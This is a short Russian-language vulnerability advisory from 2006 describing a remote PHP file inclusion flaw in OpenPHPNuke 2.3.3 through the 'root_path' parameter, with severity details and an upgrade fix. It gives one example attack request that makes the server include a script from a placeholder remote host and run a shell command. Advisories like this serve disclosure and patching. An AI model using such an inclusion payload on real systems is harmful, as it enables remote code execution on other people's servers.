PHP-инклюдинг в OpenPHPNuke

Дата публикации:
02.05.2006
Дата изменения:
03.05.2006
Всего просмотров:
1232
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
OpenPHPNuke 2.x
Уязвимые версии: OpenPHPNuke 2.3.3, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "root_path". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена. Пример:

/master.php?root_path=http://yourhost/cmd.gif?cmd=ls

URL производителя: www.openphpnuke.com

Решение: Установите последнюю версию (2.3.5) с сайта производителя.

или введите имя

CAPTCHA